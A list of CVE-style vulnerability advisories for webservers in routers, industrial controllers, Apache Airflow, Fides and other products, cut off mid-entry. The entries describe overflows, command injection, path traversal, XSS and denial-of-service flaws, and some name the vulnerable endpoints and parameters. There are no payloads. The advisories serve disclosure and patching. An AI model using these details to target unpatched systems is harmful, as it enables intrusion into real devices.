D-Link DIR-3040 prog.cgi SetWanSettings Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-3040 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21619.
D-Link DIR-3040 prog.cgi SetWan3Settings Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-3040 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21618.
D-Link DIR-3040 prog.cgi SetQuickVPNSettings Password Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-3040 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21617.
D-Link DIR-3040 prog.cgi SetDynamicDNSSettings Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-3040 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21616.
Directory traversal vulnerability exists in A.K.I Software's PMailServer/PMailServer2 products' CGIs included in Internal Simple Webserver. If this vulnerability is exploited, a remote attacker may access arbitrary files outside DocumentRoot.
The session fixation vulnerability allowed the authenticated user to continue accessing Airflow webserver even after the password of the user has been reset by the admin - up until the expiry of the session of the user. Other than manually cleaning the session database (for database session backend), or changing the secure_key and restarting the webserver, there were no mechanisms to force-logout the user (and all other users with that). With this fix implemented, when using the database session backend, the existing sessions of the user are invalidated when the password of the user is reset. When using the securecookie session backend, the sessions are NOT invalidated and still require changing the secure key and restarting the webserver (and logging out all other users), but the user resetting the password is informed about it with a flash message warning displayed in the UI. Documentation is also updated explaining this behaviour. Users of Apache Airflow are advised to upgrade to version 2.7.0 or newer to mitigate the risk associated with this vulnerability.
Execution with Unnecessary Privileges, : Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache Airflow.The "Run Task" feature enables authenticated user to bypass some of the restrictions put in place. It allows to execute code in the webserver context as well as allows to bypas limitation of access the user has to certain DAGs. The "Run Task" feature is considered dangerous and it has been removed entirely in Airflow 2.6.0 This issue affects Apache Airflow: before 2.6.0.
A vulnerability has been identified in SIMATIC CP 1242-7 V2 (incl. SIPLUS variants) (All versions &lt; V3.4.29), SIMATIC CP 1243-1 (incl. SIPLUS variants) (All versions &lt; V3.4.29), SIMATIC CP 1243-1 DNP3 (incl. SIPLUS variants) (All versions), SIMATIC CP 1243-1 IEC (incl. SIPLUS variants) (All versions &lt; V3.4.29), SIMATIC CP 1243-7 LTE (All versions &lt; V3.4.29), SIMATIC CP 1243-8 IRC (6GK7243-8RX30-0XE0) (All versions &lt; V3.4.29), SIMATIC CP 1542SP-1 (6GK7542-6UX00-0XE0) (All versions &lt; V2.3), SIMATIC CP 1542SP-1 IRC (6GK7542-6VX00-0XE0) (All versions &lt; V2.3), SIMATIC CP 1543-1 (6GK7543-1AX00-0XE0) (All versions &lt; V3.0.37), SIMATIC CP 1543SP-1 (6GK7543-6WX00-0XE0) (All versions &lt; V2.3), SINAMICS S210 (6SL5...) (All versions &gt;= V6.1 &lt; V6.1 HF2), SIPLUS ET 200SP CP 1542SP-1 IRC TX RAIL (6AG2542-6VX00-4XE0) (All versions &lt; V2.3), SIPLUS ET 200SP CP 1543SP-1 ISEC (6AG1543-6WX00-7XE0) (All versions &lt; V2.3), SIPLUS ET 200SP CP 1543SP-1 ISEC TX RAIL (6AG2543-6WX00-4XE0) (All versions &lt; V2.3), SIPLUS NET CP 1543-1 (6AG1543-1AX00-2XE0) (All versions &lt; V3.0.37). The webserver implementation of the affected products does not correctly release allocated memory after it has been used. An attacker with network access could use this vulnerability to cause a denial-of-service condition in the webserver of the affected product.
An OS command injection vulnerability has been found on EasyPHP Webserver affecting version 14.1. This vulnerability could allow an attacker to get full access to the system by sending a specially crafted exploit to the /index.php?zone=settings parameter.
Fides is an open-source privacy engineering platform for managing data privacy requests and privacy regulations. The Fides webserver is vulnerable to a type of Denial of Service (DoS) attack. Attackers can exploit this vulnerability to upload zip files containing malicious SVG bombs (similar to a billion laughs attack), causing resource exhaustion in Admin UI browser tabs and creating a persistent denial of service of the 'new connector' page (`datastore-connection/new`). This vulnerability affects Fides versions `2.11.0` through `2.15.1`. Exploitation is limited to users with elevated privileges with the `CONNECTOR_TEMPLATE_REGISTER` scope, which includes root users and users with the owner role. The vulnerability has been patched in Fides version `2.16.0`. Users are advised to upgrade to this version or later to secure their systems against this threat. There is no known workaround to remediate this vulnerability without upgrading.
Fides is an open-source privacy engineering platform for managing data privacy requests and privacy regulations. The Fides webserver is vulnerable to a type of Denial of Service (DoS) attack. Attackers can exploit a weakness in the connector template upload feature to upload a malicious zip bomb file, resulting in resource exhaustion and service unavailability for all users of the Fides webserver. This vulnerability affects Fides versions `2.11.0` through `2.15.1`. Exploitation is limited to users with elevated privileges with the `CONNECTOR_TEMPLATE_REGISTER` scope, which includes root users and users with the owner role. The vulnerability has been patched in Fides version `2.16.0`. Users are advised to upgrade to this version or later to secure their systems against this threat. There is no known workaround to remediate this vulnerability without upgrading. If an attack occurs, the impact can be mitigated by manually or automatically restarting the affected container.
Fides is an open-source privacy engineering platform for managing the fulfillment of data privacy requests in a runtime environment, and the enforcement of privacy regulations in code. A path traversal (directory traversal) vulnerability affects fides versions lower than version `2.15.1`, allowing remote attackers to access arbitrary files on the fides webserver container's filesystem. The vulnerability is patched in fides `2.15.1`. If the Fides webserver API is not directly accessible to attackers and is instead deployed behind a reverse proxy as recommended in Ethyca's security best practice documentation, and the reverse proxy is an AWS application load balancer, the vulnerability can't be exploited by these attackers. An AWS application load balancer will reject this attack with a 400 error. Additionally, any secrets supplied to the container using environment variables rather than a `fides.toml` configuration file are not affected by this vulnerability.
A vulnerability has been identified in RUGGEDCOM ROX MX5000 (All versions &lt; V2.16.0), RUGGEDCOM ROX MX5000RE (All versions &lt; V2.16.0), RUGGEDCOM ROX RX1400 (All versions &lt; V2.16.0), RUGGEDCOM ROX RX1500 (All versions &lt; V2.16.0), RUGGEDCOM ROX RX1501 (All versions &lt; V2.16.0), RUGGEDCOM ROX RX1510 (All versions &lt; V2.16.0), RUGGEDCOM ROX RX1511 (All versions &lt; V2.16.0), RUGGEDCOM ROX RX1512 (All versions &lt; V2.16.0), RUGGEDCOM ROX RX1524 (All versions &lt; V2.16.0), RUGGEDCOM ROX RX1536 (All versions &lt; V2.16.0), RUGGEDCOM ROX RX5000 (All versions &lt; V2.16.0). The webserver of the affected devices support insecure TLS 1.0 protocol. An attacker could achieve a man-in-the-middle attack and compromise confidentiality and integrity of data.
In Apache Airflow, some potentially sensitive values were being shown to the user in certain situations. This vulnerability is mitigated by the fact configuration is not shown in the UI by default (only if `[webserver] expose_config` is set to `non-sensitive-only`), and not all uncensored values are actually sentitive. This issue affects Apache Airflow: from 2.5.0 before 2.6.2. Users are recommended to update to version 2.6.2 or later.
A Directory Browsing vulnerability in MCL-Net version 4.3.5.8788 webserver running on default port 5080, allows attackers to gain sensitive information about the configured databases via the "/file" endpoint.
SpiderControl SCADA Webserver versions 2.08 and prior are vulnerable to path traversal. An attacker with administrative privileges could overwrite files on the webserver using the HMI's upload file feature. This could create size zero files anywhere on the webserver, potentially overwriting system files and creating a denial-of-service condition.
Xibo is a content management system (CMS). A path traversal vulnerability exists in the Xibo CMS whereby a specially crafted zip file can be uploaded to the CMS via the layout import function by an authenticated user which would allow creation of files outside of the CMS library directory as the webserver user. This can be used to upload a PHP webshell inside the web root directory and achieve remote code execution as the webserver user. Users should upgrade to version 2.3.17 or 3.3.5, which fix this issue. Customers who host their CMS with Xibo Signage have already received an upgrade or patch to resolve this issue regardless of the CMS version that they are running.
Uncontrolled Resource Consumption in SICK FTMg AIR FLOW SENSOR with Partnumbers 1100214, 1100215, 1100216, 1120114, 1120116, 1122524, 1122526 allows an remote attacker to influence the availability of the webserver by invocing a Slowloris style attack via HTTP requests.
Pimcore is an open source data and experience management platform. Versions of Pimcore prior to 10.5.18 are vulnerable to path traversal. The impact of this path traversal and arbitrary extension is limited to creation of arbitrary files and appending data to existing files. When combined with the SQL Injection, the exported data `RESTRICTED DIFFUSION 9 / 9` can be controlled and a webshell can be uploaded. Attackers can use that to execute arbitrary PHP code on the server with the permissions of the webserver. Users may upgrade to version 10.5.18 to receive a patch or, as a workaround, apply the patch manually.
php-saml-sp before 1.1.1 and 2.x before 2.1.1 allows reading arbitrary files as the webserver user because resolving XML external entities was silently enabled via \LIBXML_DTDLOAD | \LIBXML_DTDATTR.
A CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability exists on a DCE endpoint through the logging capabilities of the webserver. Affected products: StruxureWare Data Center Expert (V7.9.2 and prior)
An HTML injection vulnerability exists in the MT Safeline X-Ray X3310 webserver version NXG 19.05 that enables a remote attacker to render malicious HTML and obtain sensitive information in a victim's browser.
A reflected cross-site scripting (XSS) vulnerability exists in the MT Safeline X-Ray X3310 webserver version NXG 19.05 that enables a remote attacker to execute JavaScript code and obtain sensitive information in a victim's browser.
An issue in Mojoportal v2.7.0.0 and below allows an authenticated attacker to list all css files inside the root path of the webserver via manipulation of the "s" parameter in /DesignTools/ManageSkin.aspx
Uncontrolled Resource Consumption in SICK FTMg AIR FLOW SENSOR with Partnumbers 1100214, 1100215, 1100216, 1120114, 1120116, 1122524, 1122526 allows an unprivileged remote attacker to influence the availability of the webserver by invocing several open file requests via the REST interface.
White Rabbit Switch contains a vulnerability which makes it possible for an attacker to perform system commands under the context of the web application (the default installation makes the webserver run as the root user).
In Advantech WebAccss/SCADA v9.1.3 and prior, there is an arbitrary file upload vulnerability that could allow an attacker to upload an ASP script file to a webserver when logged in as manager user, which can lead to arbitrary code execution.
Rockwell Automation was made aware of a vulnerability by a security researcher from Georgia Institute of Technology that the MicroLogix 1100 and 1400 controllers contain a vulnerability that may give an attacker the ability to accomplish remote code execution. The vulnerability is an unauthenticated stored cross-site scripting vulnerability in the embedded webserver. The payload is transferred to the controller over SNMP and is rendered on the homepage of the embedded website.
A vulnerability has been identified in SCALANCE X204RNA (HSR) (All versions &lt; V3.2.7), SCALANCE X204RNA (PRP) (All versions &lt; V3.2.7), SCALANCE X204RNA EEC (HSR) (All versions &lt; V3.2.7), SCALANCE X204RNA EEC (PRP) (All versions &lt; V3.2.7), SCALANCE X204RNA EEC (PRP/HSR) (All versions &lt; V3.2.7). The webserver of an affected device is missing specific security headers. This could allow an remote attacker to extract confidential session information under certain circumstances.
A vulnerability has been identified in SCALANCE X204RNA (HSR) (All versions &lt; V3.2.7), SCALANCE X204RNA (PRP) (All versions &lt; V3.2.7), SCALANCE X204RNA EEC (HSR) (All versions &lt; V3.2.7), SCALANCE X204RNA EEC (PRP) (All versions &lt; V3.2.7), SCALANCE X204RNA EEC (PRP/HSR) (All versions &lt; V3.2.7). The webserver of affected devices calculates session ids and nonces in an insecure manner. This could allow an unauthenticated remote attacker to brute-force session ids and hijack existing sessions.
The webserver in Delta DX-3021 versions prior to 1.24 is vulnerable to command injection through the network diagnosis page. This vulnerability could allow a remote unauthenticated user to add files, delete files, and change file permissions.
In Apache Airflow versions prior to 2.4.3, there was an open redirect in the webserver's `/login` endpoint.
A CORS Misconfiguration in the web-based management allows a malicious third party webserver to misuse all basic information pages on the webserver. In combination with CVE-2022-45138 this could lead to disclosure of device information like CPU diagnostics. As there is just a limited amount of information readable the impact only affects a small subset of confidentiality.
In Apache Airflow versions prior to 2.4.2, there was an open redirect in the webserver's `/confirm` endpoint.
A vulnerability has been identified in SIMATIC CP 1242-7 V2 (6GK7242-7KX31-0XE0) (All versions &lt; V3.4.29), SIMATIC CP 1243-1 (6GK7243-1BX30-0XE0) (All versions &lt; V3.4.29), SIMATIC CP 1243-1 DNP3 (incl. SIPLUS variants) (All versions &lt; V3.4.29), SIMATIC CP 1243-1 IEC (incl. SIPLUS variants) (All versions &lt; V3.4.29), SIMATIC CP 1243-7 LTE EU (6GK7243-7KX30-0XE0) (All versions &lt; V3.4.29), SIMATIC CP 1243-7 LTE US (6GK7243-7SX30-0XE0) (All versions &lt; V3.4.29), SIMATIC CP 1243-8 IRC (6GK7243-8RX30-0XE0) (All versions &lt; V3.4.29), SIMATIC CP 1542SP-1 (6GK7542-6UX00-0XE0) (All versions &lt; V2.3), SIMATIC CP 1542SP-1 IRC (6GK7542-6VX00-0XE0) (All versions &lt; V2.3), SIMATIC CP 1543SP-1 (6GK7543-6WX00-0XE0) (All versions &lt; V2.3), SIMATIC CP 443-1 (6GK7443-1EX30-0XE0) (All versions &lt; V3.3), SIMATIC CP 443-1 (6GK7443-1EX30-0XE1) (All versions &lt; V3.3), SIMATIC CP 443-1 Advanced (6GK7443-1GX30-0XE0) (All versions &lt; V3.3), SIPLUS ET 200SP CP 1542SP-1 IRC TX RAIL (6AG2542-6VX00-4XE0) (All versions &lt; V2.3), SIPLUS ET 200SP CP 1543SP-1 ISEC (6AG1543-6WX00-7XE0) (All versions &lt; V2.3), SIPLUS ET 200SP CP 1543SP-1 ISEC TX RAIL (6AG2543-6WX00-4XE0) (All versions &lt; V2.3), SIPLUS NET CP 1242-7 V2 (6AG1242-7KX31-7XE0) (All versions &lt; V3.4.29), SIPLUS NET CP 443-1 (6AG1443-1EX30-4XE0) (All versions &lt; V3.3), SIPLUS NET CP 443-1 Advanced (6AG1443-1GX30-4XE0) (All versions &lt; V3.3), SIPLUS S7-1200 CP 1243-1 (6AG1243-1BX30-2AX0) (All versions &lt; V3.4.29), SIPLUS S7-1200 CP 1243-1 RAIL (6AG2243-1BX30-1XE0) (All versions &lt; V3.4.29), SIPLUS TIM 1531 IRC (6AG1543-1MX00-7XE0) (All versions &lt; V2.3.6), TIM 1531 IRC (6GK7543-1MX00-0XE0) (All versions &lt; V2.3.6). The webserver of the affected products contains a vulnerability that may lead to a denial of service condition. An attacker may cause a denial of service situation of the webserver of the affected product.
A vulnerability has been identified in SIMATIC CP 1242-7 V2 (6GK7242-7KX31-0XE0) (All versions &lt; V3.4.29), SIMATIC CP 1243-1 (6GK7243-1BX30-0XE0) (All versions &lt; V3.4.29), SIMATIC CP 1243-1 DNP3 (incl. SIPLUS variants) (All versions &lt; V3.4.29), SIMATIC CP 1243-1 IEC (incl. SIPLUS variants) (All versions &lt; V3.4.29), SIMATIC CP 1243-7 LTE EU (6GK7243-7KX30-0XE0) (All versions &lt; V3.4.29), SIMATIC CP 1243-7 LTE US (6GK7243-7SX30-0XE0) (All versions &lt; V3.4.29), SIMATIC CP 1243-8 IRC (6GK7243-8RX30-0XE0) (All versions &lt; V3.4.29), SIMATIC CP 1542SP-1 (6GK7542-6UX00-0XE0) (All versions &lt; V2.3), SIMATIC CP 1542SP-1 IRC (6GK7542-6VX00-0XE0) (All versions &lt; V2.3), SIMATIC CP 1543SP-1 (6GK7543-6WX00-0XE0) (All versions &lt; V2.3), SIMATIC CP 443-1 (6GK7443-1EX30-0XE0) (All versions &lt; V3.3), SIMATIC CP 443-1 (6GK7443-1EX30-0XE1) (All versions &lt; V3.3), SIMATIC CP 443-1 Advanced (6GK7443-1GX30-0XE0) (All versions &lt; V3.3), SIPLUS ET 200SP CP 1542SP-1 IRC TX RAIL (6AG2542-6VX00-4XE0) (All versions &lt; V2.3), SIPLUS ET 200SP CP 1543SP-1 ISEC (6AG1543-6WX00-7XE0) (All versions &lt; V2.3), SIPLUS ET 200SP CP 1543SP-1 ISEC TX RAIL (6AG2543-6WX00-4XE0) (All versions &lt; V2.3), SIPLUS NET CP 1242-7 V2 (6AG1242-7KX31-7XE0) (All versions &lt; V3.4.29), SIPLUS NET CP 443-1 (6AG1443-1EX30-4XE0) (All versions &lt; V3.3), SIPLUS NET CP 443-1 Advanced (6AG1443-1GX30-4XE0) (All versions &lt; V3.3), SIPLUS S7-1200 CP 1243-1 (6AG1243-1BX30-2AX0) (All versions &lt; V3.4.29), SIPLUS S7-1200 CP 1243-1 RAIL (6AG2243-1BX30-1XE0) (All versions &lt; V3.4.29), SIPLUS TIM 1531 IRC (6AG1543-1MX00-7XE0) (All versions &lt; V2.3.6), TIM 1531 IRC (6GK7543-1MX00-0XE0) (All versions &lt; V2.3.6). The webserver of the affected products contains a vulnerability that may lead to a denial of service condition. An attacker may cause a denial of service situation of the webserver of the affected product.
A vulnerability has been identified in SIMATIC CP 1242-7 V2 (6GK7242-7KX31-0XE0) (All versions &lt; V3.4.29), SIMATIC CP 1243-1 (6GK7243-1BX30-0XE0) (All versions &lt; V3.4.29), SIMATIC CP 1243-1 DNP3 (incl. SIPLUS variants) (All versions &lt; V3.4.29), SIMATIC CP 1243-1 IEC (incl. SIPLUS variants) (All versions &lt; V3.4.29), SIMATIC CP 1243-7 LTE EU (6GK7243-7KX30-0XE0) (All versions &lt; V3.4.29), SIMATIC CP 1243-7 LTE US (6GK7243-7SX30-0XE0) (All versions &lt; V3.4.29), SIMATIC CP 1243-8 IRC (6GK7243-8RX30-0XE0) (All versions &lt; V3.4.29), SIMATIC CP 1542SP-1 (6GK7542-6UX00-0XE0) (All versions &lt; V2.3), SIMATIC CP 1542SP-1 IRC (6GK7542-6VX00-0XE0) (All versions &lt; V2.3), SIMATIC CP 1543SP-1 (6GK7543-6WX00-0XE0) (All versions &lt; V2.3), SIMATIC CP 443-1 (6GK7443-1EX30-0XE0) (All versions &lt; V3.3), SIMATIC CP 443-1 (6GK7443-1EX30-0XE1) (All versions &lt; V3.3), SIMATIC CP 443-1 Advanced (6GK7443-1GX30-0XE0) (All versions &lt; V3.3), SIPLUS ET 200SP CP 1542SP-1 IRC TX RAIL (6AG2542-6VX00-4XE0) (All versions &lt; V2.3), SIPLUS ET 200SP CP 1543SP-1 ISEC (6AG1543-6WX00-7XE0) (All versions &lt; V2.3), SIPLUS ET 200SP CP 1543SP-1 ISEC TX RAIL (6AG2543-6WX00-4XE0) (All versions &lt; V2.3), SIPLUS NET CP 1242-7 V2 (6AG1242-7KX31-7XE0) (All versions &lt; V3.4.29), SIPLUS NET CP 443-1 (6AG1443-1EX30-4XE0) (All versions &lt; V3.3), SIPLUS NET CP 443-1 Advanced (6AG1443-1GX30-4XE0) (All versions &lt; V3.3), SIPLUS S7-1200 CP 1243-1 (6AG1243-1BX30-2AX0) (All versions &lt; V3.4.29), SIPLUS S7-1200 CP 1243-1 RAIL (6AG2243-1BX30-1XE0) (All versions &lt; V3.4.29), SIPLUS TIM 1531 IRC (6AG1543-1MX00-7XE0) (All versions &lt; V2.3.6), TIM 1531 IRC (6GK7543-1MX00-0XE0) (All versions &lt; V2.3.6). The webserver of the affected products contains a vulnerability that may lead to a denial of service condition. An attacker may cause a denial of service situation which leads to a restart of the webserver of the affected product.
A missing permission check in Jenkins NS-ND Integration Performance Publisher Plugin 4.8.0.129 and earlier allows attackers with Overall/Read permissions to connect to an attacker-specified webserver using attacker-specified credentials.
A cross-site request forgery (CSRF) vulnerability in Jenkins NS-ND Integration Performance Publisher Plugin 4.8.0.129 and earlier allows attackers to connect to an attacker-specified webserver using attacker-specified credentials.
In Apache Airflow 2.3.0 through 2.3.4, there was an open redirect in the webserver's `/confirm` endpoint.
Onedev is an open source, self-hosted Git Server with CI/CD and Kanban. During CI/CD builds, it is possible to save build artifacts for later retrieval. They can be accessed through OneDev's web UI after the successful run of a build. These artifact files are served by the webserver in the same context as the UI without any further restrictions. This leads to Cross-Site Scripting (XSS) when a user creates a build artifact that contains HTML. When accessing the artifact, the content is rendered by the browser, including any JavaScript that it contains. Since all cookies (except for the rememberMe one) do not set the HttpOnly flag, an attacker could steal the session of a victim and use it to impersonate them. To exploit this issue, attackers need to be able to modify the content of artifacts, which usually means they need to be able to modify a project's build spec. The exploitation requires the victim to click on an attacker's link. It can be used to elevate privileges by targeting admins of a OneDev instance. In the worst case, this can lead to arbitrary code execution on the server, because admins can create Server Shell Executors and use them to run any command on the server. This issue has been patched in version 7.3.0. Users are advised to upgrade. There are no known workarounds for this issue.
In Apache Airflow prior to 2.3.4, an insecure umask was configured for numerous Airflow components when running with the `--daemon` flag which could result in a race condition giving world-writable files in the Airflow home directory and allowing local users to expose arbitrary file contents via the webserver.
In Apache Airflow versions 2.2.4 through 2.3.3, the `database` webserver session backend was susceptible to session fixation.
A CWE-476: NULL Pointer Dereference vulnerability exists that could cause a denial of service of the webserver when parsing JSON content type. Affected Products: X80 advanced RTU Communication Module (BMENOR2200H) (V2.01 and later), OPC UA Modicon Communication Module (BMENUA0100) (V1.10 and prior)
A CWE-835: Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability exists that could cause a denial of service of the webserver due to improper handling of the cookies. Affected Products: X80 advanced RTU Communication Module (BMENOR2200H) (V1.0), OPC UA Modicon Communication Module (BMENUA0100) (V1.10 and prior)
A CWE-787: Out-of-bounds Write vulnerability exists that could cause a denial of service of the webserver due to improper parsing of the HTTP Headers. Affected Products: X80 advanced RTU Communication Module (BMENOR2200H) (V1.0), OPC UA Modicon Communication Module (BMENUA0100) (V1.10 and prior)
Rockwell Automation was made aware that the webservers of the Micrologix 1100 and 1400 controllers contain a vulnerability that may lead to a denial-of-service condition. The security vulnerability could be exploited by an attacker with network access to the affected systems by sending TCP packets to webserver and closing it abruptly which would cause a denial-of-service condition for the web server application on the device
An issue was discovered in Infiray IRAY-A8Z3 1.0.957. The webserver contains an endpoint that can execute arbitrary commands by manipulating the cmd_string URL parameter.
A cross-site request forgery (CSRF) vulnerability in Jenkins Script Security Plugin 1158.v7c1b_73a_69a_08 and earlier allows attackers to have Jenkins send an HTTP request to an attacker-specified webserver.
In Afian Filerun 20220202 Changing the "search_tika_path" variable to a custom (and previously uploaded) jar file results in remote code execution in the context of the webserver user.
Uncaught exception in webserver for the Integrated BMC in some Intel(R) platforms before versions 2.86, 2.09 and 2.78 may allow a privileged user to potentially enable denial of service via network access.
libkiwix 10.0.0 and 10.0.1 allows XSS in the built-in webserver functionality via the search suggestions URL parameter. This is fixed in 10.1.0.
Due to the lack of adequately implemented access-control rules, all versions Kingspan TMS300 CS are vulnerable to an attacker viewing and modifying the application settings without authenticating by accessing a specific uniform resource locator (URL) on the webserver.
A vulnerability has been identified in SCALANCE X200-4P IRT (All versions &lt; V5.5.2), SCALANCE X201-3P IRT (All versions &lt; V5.5.2), SCALANCE X201-3P IRT PRO (All versions &lt; V5.5.2), SCALANCE X202-2IRT (All versions &lt; V5.5.2), SCALANCE X202-2IRT (All versions &lt; V5.5.2), SCALANCE X202-2P IRT (All versions &lt; V5.5.2), SCALANCE X202-2P IRT PRO (All versions &lt; V5.5.2), SCALANCE X204-2 (All versions &lt; V5.2.6), SCALANCE X204-2FM (All versions &lt; V5.2.6), SCALANCE X204-2LD (All versions &lt; V5.2.6), SCALANCE X204-2LD TS (All versions &lt; V5.2.6), SCALANCE X204-2TS (All versions &lt; V5.2.6), SCALANCE X204IRT (All versions &lt; V5.5.2), SCALANCE X204IRT (All versions &lt; V5.5.2), SCALANCE X204IRT PRO (All versions &lt; V5.5.2), SCALANCE X206-1 (All versions &lt; V5.2.6), SCALANCE X206-1LD (All versions &lt; V5.2.6), SCALANCE X208 (All versions &lt; V5.2.6), SCALANCE X208PRO (All versions &lt; V5.2.6), SCALANCE X212-2 (All versions &lt; V5.2.6), SCALANCE X212-2LD (All versions &lt; V5.2.6), SCALANCE X216 (All versions &lt; V5.2.6), SCALANCE X224 (All versions &lt; V5.2.6), SCALANCE XF201-3P IRT (All versions &lt; V5.5.2), SCALANCE XF202-2P IRT (All versions &lt; V5.5.2), SCALANCE XF204 (All versions &lt; V5.2.6), SCALANCE XF204-2 (All versions &lt; V5.2.6), SCALANCE XF204-2BA IRT (All versions &lt; V5.5.2), SCALANCE XF204IRT (All versions &lt; V5.5.2), SCALANCE XF206-1 (All versions &lt; V5.2.6), SCALANCE XF208 (All versions &lt; V5.2.6). The webserver of affected devices calculates session ids and nonces in an insecure manner. This could allow an unauthenticated remote attacker to brute-force session ids and hijack existing sessions.
A vulnerability has been identified in SCALANCE X302-7 EEC (230V), SCALANCE X302-7 EEC (230V, coated), SCALANCE X302-7 EEC (24V), SCALANCE X302-7 EEC (24V, coated), SCALANCE X302-7 EEC (2x 230V), SCALANCE X302-7 EEC (2x 230V, coated), SCALANCE X302-7 EEC (2x 24V), SCALANCE X302-7 EEC (2x 24V, coated), SCALANCE X304-2FE, SCALANCE X306-1LD FE, SCALANCE X307-2 EEC (230V), SCALANCE X307-2 EEC (230V, coated), SCALANCE X307-2 EEC (24V), SCALANCE X307-2 EEC (24V, coated), SCALANCE X307-2 EEC (2x 230V), SCALANCE X307-2 EEC (2x 230V, coated), SCALANCE X307-2 EEC (2x 24V), SCALANCE X307-2 EEC (2x 24V, coated), SCALANCE X307-3, SCALANCE X307-3, SCALANCE X307-3LD, SCALANCE X307-3LD, SCALANCE X308-2, SCALANCE X308-2, SCALANCE X308-2LD, SCALANCE X308-2LD, SCALANCE X308-2LH, SCALANCE X308-2LH, SCALANCE X308-2LH+, SCALANCE X308-2LH+, SCALANCE X308-2M, SCALANCE X308-2M, SCALANCE X308-2M PoE, SCALANCE X308-2M PoE, SCALANCE X308-2M TS, SCALANCE X308-2M TS, SCALANCE X310, SCALANCE X310, SCALANCE X310FE, SCALANCE X310FE, SCALANCE X320-1 FE, SCALANCE X320-1-2LD FE, SCALANCE X408-2, SCALANCE XR324-12M (230V, ports on front), SCALANCE XR324-12M (230V, ports on front), SCALANCE XR324-12M (230V, ports on rear), SCALANCE XR324-12M (230V, ports on rear), SCALANCE XR324-12M (24V, ports on front), SCALANCE XR324-12M (24V, ports on front), SCALANCE XR324-12M (24V, ports on rear), SCALANCE XR324-12M (24V, ports on rear), SCALANCE XR324-12M TS (24V), SCALANCE XR324-12M TS (24V), SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on front), SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on front), SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on rear), SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on rear), SCALANCE XR324-4M EEC (24V, ports on front), SCALANCE XR324-4M EEC (24V, ports on front), SCALANCE XR324-4M EEC (24V, ports on rear), SCALANCE XR324-4M EEC (24V, ports on rear), SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on front), SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on front), SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on rear), SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on rear), SCALANCE XR324-4M EEC (2x 24V, ports on front), SCALANCE XR324-4M EEC (2x 24V, ports on front), SCALANCE XR324-4M EEC (2x 24V, ports on rear), SCALANCE XR324-4M EEC (2x 24V, ports on rear), SCALANCE XR324-4M PoE (230V, ports on front), SCALANCE XR324-4M PoE (230V, ports on rear), SCALANCE XR324-4M PoE (24V, ports on front), SCALANCE XR324-4M PoE (24V, ports on rear), SCALANCE XR324-4M PoE TS (24V, ports on front), SIPLUS NET SCALANCE X308-2. The webserver of an affected device is missing specific security headers. This could allow an remote attacker to extract confidential session information under certain circumstances.
A vulnerability has been identified in SCALANCE X302-7 EEC (230V), SCALANCE X302-7 EEC (230V, coated), SCALANCE X302-7 EEC (24V), SCALANCE X302-7 EEC (24V, coated), SCALANCE X302-7 EEC (2x 230V), SCALANCE X302-7 EEC (2x 230V, coated), SCALANCE X302-7 EEC (2x 24V), SCALANCE X302-7 EEC (2x 24V, coated), SCALANCE X304-2FE, SCALANCE X306-1LD FE, SCALANCE X307-2 EEC (230V), SCALANCE X307-2 EEC (230V, coated), SCALANCE X307-2 EEC (24V), SCALANCE X307-2 EEC (24V, coated), SCALANCE X307-2 EEC (2x 230V), SCALANCE X307-2 EEC (2x 230V, coated), SCALANCE X307-2 EEC (2x 24V), SCALANCE X307-2 EEC (2x 24V, coated), SCALANCE X307-3, SCALANCE X307-3, SCALANCE X307-3LD, SCALANCE X307-3LD, SCALANCE X308-2, SCALANCE X308-2, SCALANCE X308-2LD, SCALANCE X308-2LD, SCALANCE X308-2LH, SCALANCE X308-2LH, SCALANCE X308-2LH+, SCALANCE X308-2LH+, SCALANCE X308-2M, SCALANCE X308-2M, SCALANCE X308-2M PoE, SCALANCE X308-2M PoE, SCALANCE X308-2M TS, SCALANCE X308-2M TS, SCALANCE X310, SCALANCE X310, SCALANCE X310FE, SCALANCE X310FE, SCALANCE X320-1 FE, SCALANCE X320-1-2LD FE, SCALANCE X408-2, SCALANCE XR324-12M (230V, ports on front), SCALANCE XR324-12M (230V, ports on front), SCALANCE XR324-12M (230V, ports on rear), SCALANCE XR324-12M (230V, ports on rear), SCALANCE XR324-12M (24V, ports on front), SCALANCE XR324-12M (24V, ports on front), SCALANCE XR324-12M (24V, ports on rear), SCALANCE 